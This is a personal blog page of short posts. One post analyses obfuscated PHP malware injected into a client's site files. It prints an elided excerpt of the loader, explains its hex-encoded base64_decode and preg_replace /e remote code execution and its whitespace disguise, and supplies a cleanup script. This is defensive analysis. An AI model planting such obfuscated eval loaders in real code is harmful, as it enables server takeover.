New quiz: Misperceptions

Take this online quiz first, then come back to read the rest of this post. It won’t take long, honest.

All done? Don’t be too disheartened if you got a low score. If you scored more than zero, then you’re doing better than most people, apparently.

Yesterday, Ipsos-MORI published the results of a recent survey on public perceptions of common social policy issues. The results seem to show that the British public doesn’t really have a clue about anything.

I made this quiz based on the top 10 misperceptions identified by this survey. To be honest, I don’t think I’d have scored particularly well in this quiz before I read about the survey results.

How can people possibly vote sensibly if their perceptions are so distorted? Something needs to be done, really.

Tagged with: , ,

An American Wacko in London

Conspiracy theorist Alex Jones guested with David Aaronovitch on the Politics Show last weekend.

Among other batshit assertions, he claimed that the Euro is a Nazi German plan, that Prince Bernhard of the Netherlands was an SS officer, and that vaccines have been adulterated with a cancer virus in order to create a eugenics program.

Skip to 04:20 for the final meltdown (prompted by an off-camera “Oi, shut it!” from exasperated host Andrew Neil).

This lunatic apparently has a radio audience of over two million in the US. Well, he is quite entertaining, I suppose.

Get Adobe Flash player
Tagged with:

Dandelion clock

Here’s a dandelion clock I made using SVG’s built-in animation functions. Unlike every other SVG clock I’ve seen*, this one doesn’t use any Javascript at all. Instead, the hands are rotated by using <animateTransform> tags, and their starting positions are calculated on the server and pre-loaded into the SVG file.

* Admittedly, I haven’t been looking very hard.

Tagged with:

glimmer.mp3

I made a tune. Hope you like it.

Creative Commons Licence
Licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.

Tagged with: ,

Bad Toys II

If Michael Bay had directed Toy Story, it might have ended up something like this…

Tagged with:

World Stylophone Quartet

This video deserves more views:

Tagged with: ,

PHP malware

I was recently asked to quote for some work on the website of a business that delivers education-related services (I’m not naming any names here). To get an idea of the work involved, I asked for the FTP login details so I could take a look at the code that was already there. What I found wasn’t very encouraging. Just about every PHP file on the server started with the following code:

<?php                                                                   

                      /*versio:2.19*/$I1l1=53885;if (!function_exists('I
ll11llI')){$GLOBALS['I1l1'] = ')Y3VybA!jtX2luaXQYWxsb3dfdXJsX2ZvcGVukE?~
MQaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cwwtX3NldG9wdA@FX2V4ZWMekJndheT1
                                    :
... (continues in a similar vein for about another 3,000 characters) ...
                                    :
HZ0liUnl4b1k5SHh4UkZUTm1WeXo4R09wL3RZVWl4Y3NiTTNuNXRtemxEd2RWejc4L2dWWEd
qanEiKSkpOwMcHJlZ19yZXBsYWNl';function Il11Illl($a, $b){$c=$GLOBALS['I1l
1']; $d=pack('H*','62617365'.'36345f6465636f6465'); return $d(substr($c,
 $a, $b));};$Q0QO0O0O0 = Il11Illl(3365, 16);$Q0QO0O0O0("/Q0QQ0O0QQ/e", I
ll11llI(742, 2622), "Q0QQ0O0QQ");};?>

This was all crammed into one line; the line breaks here were added by me for legibility. As a result, anyone looking at the file in a text editor with word wrapping switched off would only see the first hundred or so characters:

<?php

Quite a clever disguise, since PHP files normally start with these 5 characters anyway. I didn’t bother to dissect the code completely, but it clearly allowed remote code to be executed on the server, so pretty much anything would have been possible.

The way it works is by using the base64_decode() function to unpack and run the PHP code stored in the random-looking payload that starts with )Y3VybA! in this example. To help the code bypass firewall software like mod_security, the name of this function is decoded from a pair of hexadecimal strings:

$d=pack('H*','62617365'.'36345f6465636f6465');

The pack() function decodes the string as follows: ’62’→’b’, ’61’→’a’, ’73’→’s’, ’65’→’e’, ’36’→’6′, and so on. This is assigned to variable $d, which is called to unpack the payload. The first call unpacks the 16 characters starting at position 3365 (cHJlZ19yZXBsYWNl) to get the function name preg_replace(), and by using the ‘/e’ (PREG_REPLACE_EVAL) pattern modifier in calls to this function, the code can get on with whatever it does (like adding itself to other files and fetching code from remote servers).

The code is self-modifying — every instance of it used slightly different variable names, for example. However, the code always started with /*versio: after the initial white space in each case.

Removal

By consistently starting the code with loads of white space and this odd word “versio”, the programmer made it easy to detect and remove the code with a simple search-and-replace operation, coupled with a recursive directory traversal function:

<?php

header("Content-Type: text/plain");
while (ob_get_level()) ob_end_clean();

function recursive_edit($path,
                        $matchname,
                        $searchtext,
                        $replacetext,
                        $trunc) {
  global $nmatches, $nfixes;
  foreach (glob($path.'/*') as $name) {
    if (is_dir($name)) {
      recursive_edit($name,
                     $matchname,
                     $searchtext,
                     $replacetext,
                     $trunc);
    }
    elseif (preg_match($matchname,$name)) {
      $s = file_get_contents($name);
      if (preg_match($searchtext,$s)) {
        $s = preg_replace($searchtext,$replacetext,$s);
        $nmatches++;
        echo substr($name,$trunc);
        if (!file_put_contents($name,$s)) {
          echo " ** no write access **\n";
        }
        else {
          echo " repaired\n";
          $nfixes++;
        }
      }
    }
  }
}

echo "Disinfecting files\n";
$nmatches = 0;
$nfixes = 0;

recursive_edit($_SERVER['DOCUMENT_ROOT'],'/\.php$/',
               '/<\?php\s{20,}\/\*versio:.+?\?>/s',
               '',
               strlen($_SERVER['DOCUMENT_ROOT']));

if ($nmatches) {
  echo "Repaired $nfixes out of $nmatches file";
  echo (($nmatches>1) ? 's' : '') . ".\n";
}
else {
  echo "No files needed to be changed\n";
}

?>

If you think you’ve got a similar problem, just upload this file to your server as “disinfectant.php” and point your web browser at it. If it finds any infected files, it will fix them for you as long as it has sufficient permission to do so.

Note: Usual disclaimers apply. Back everything up first. And don’t forget to change all your passwords after removing the malware. That includes your FTP, site admin and MySQL passwords. Use strong passwords this time. And while you’re at it, check your code for other vulnerabilities like cross-site scripting and SQL injection.

Tagged with: ,

A tribute to Margaret Thatcher

Tagged with: , ,

Paper is not dead!

Le papier ne sera jamais mort.

Tagged with: ,

Tax return

Aargh. It’s tax return time again :-(

Tagged with:
Top